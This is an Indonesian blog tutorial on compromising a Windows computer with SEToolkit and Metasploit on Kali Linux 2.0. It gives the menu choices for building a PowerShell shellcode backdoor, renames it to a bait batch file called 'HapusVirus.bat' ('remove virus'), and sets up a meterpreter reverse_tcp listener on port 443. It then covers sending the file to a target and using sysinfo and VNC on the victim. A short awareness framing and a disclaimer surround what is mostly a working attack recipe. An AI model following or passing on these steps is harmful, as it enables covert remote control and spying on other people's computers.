CATATANKU CATATANKU Author
Title: Exploit Windows dengan SEToolkit dan Metasploit di Kali Linux 2.0
Author: CATATANKU
Rating 5 of 5 Des:
Hai semua salam jumpa kembali, kali ini saya akan membagikan sebuah tutorial percobaan yang mungkin bisa membantu mencari kerentanan pada s...
Hai semua salam jumpa kembali, kali ini saya akan membagikan sebuah tutorial percobaan yang mungkin bisa membantu mencari kerentanan pada sistem komputer windows os anda agar setidaknya anda tahu bahwa setiap file yang mungkin saja anda pernah download sebuah backdoor yang berfungsi memberikan jalan masuk kepada si pembagi file tersebut. Karena tidak ada yang tidak mungkin jika teman anda sendirilah yang mengintai kegiatan anda di komputer kesayangan anda. Bisa saja teman anda melihat seluruh isi file dalam harddisk anda dan menghapusnya. Maka dari itu sebelum anda tertipu setidaknya anda tahu file apa yang anda download. Baiklah kjita lanjut saja ke tutorialnya

Pertama buka terminal kali linux kalian, lalu jalankan Social Engiinering Toolkit denga perintah
setoolkit
Nanti akan ditampilkan beberapa menu dari SetooSocial Engiinering Toolkit,
Lalu pilih yang nomor 1) Social-Engineering Attacks
1) Social-Engineering Attacks

Selanjutnya pilih nomor 9) Powershell Attck Vectors
9) Powershell Attck Vectors

Pada pilihan selanjutnya pilih nomor 1) Powershell Alphanumeric Shellcode Injector
1) Powershell Alphanumeric Shellcode Injector

Selanjutnya kita akan diminta untuk mengisikan IP Addres untuk listener payload, Jadi isikan IP kalian (bebas), lalu isikan port juga (misal 4444), disini saya gunakan port default yang sering digunakan yaitu 443, lalu Pada pertanyaan Do you want to start the listener now [yes/no]: pilih saja yang ketikkan no.
Masukkan IP dan PORT linstener

Screenshot di atas tertulis bahwa payload tersimpan pada folder /root/.set/report/powershell/, disana terdapat file dengan nama x86_powershell_injection.txt, itu merupakan backdoor yang akan digunakan, kemudian rename file tersebut dengan format .bat (biasanya folder .set ini terhidden untuk memunculkannya tekan CTRL+H)
rename payload

Jika tidak ingin ribet kita dapat mengcopy dan rename dengan menggunakan perintah terminal seperti di bawah ini 
mv /root/.set/powershell/x86_powershell_injection.txt/root/Desktop/HapusVirus.bat
mv /root/.set/powershell/x86_powershell_injection.txt /root/Desktop/HapusVirus.bat

Nanti file tersebut akan tersimpan di  /root/Desktop dengan nama HapusVirus.bat (bisa kalian sesuaikan sendiri namanya)

Tahap selanjutnya adalah mengirimkan backdoor tersebut ke komputer target, namun sebelumnya kita buat terlebih dahulu exploitnya.

Sebelumnya jalankan service postgresql, dengan perintah
/etc/init.d/postrgresql start
Bagi yang baru pertama kali menjalankan metasploit, lanjutkan dengan perintah dibawah ini untuk membuat databse msf
msfdb init
Bagi yang sudah pernah membuatnya, bisa langsung menjalankan postgresql lalu dilanjutkan dengan membuka msfconsole
msfconsole
msfconsole

Lalu ketikkan perintah-perintah dibawah ini
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.103
set LPORT 443
exploit
exploit

Isikan LHOST dan LPORT sesui dengan backdoor yang di buat di atas

Oke setelah semua selesai, tinggal kita kirim backdoor tersebut ke komputer target.
Kurang lebih tampilan ketika backdoor dieksekusi oleh target akan  muncul cmd seperti di bawah ini, namun hanya sesaat dan otomatis akan tertutup
payload di eksekusi

Dan kita pun mendapatkan sesi meterpreter
sesi meterpreter terbuka

Perintah meterpreter untuk melihat informasi sistem target
sysinfo
sysinfo

Perintah meterptreter untuk remote desktop target
run vnc
run vnc

Oke, itu dulu yang bisa saya bagikan mengenai Exploit Windows dengan SEToolkit dan Metasploit di Kali Linux 2.0. postingan ini di buat sebagai pengetahuan semata, segala penyalahgunaan dari postingan ini bukan tanggung jawab dari saya, Terima Kasih

About Author

Advertisement

Posting Komentar

 
Top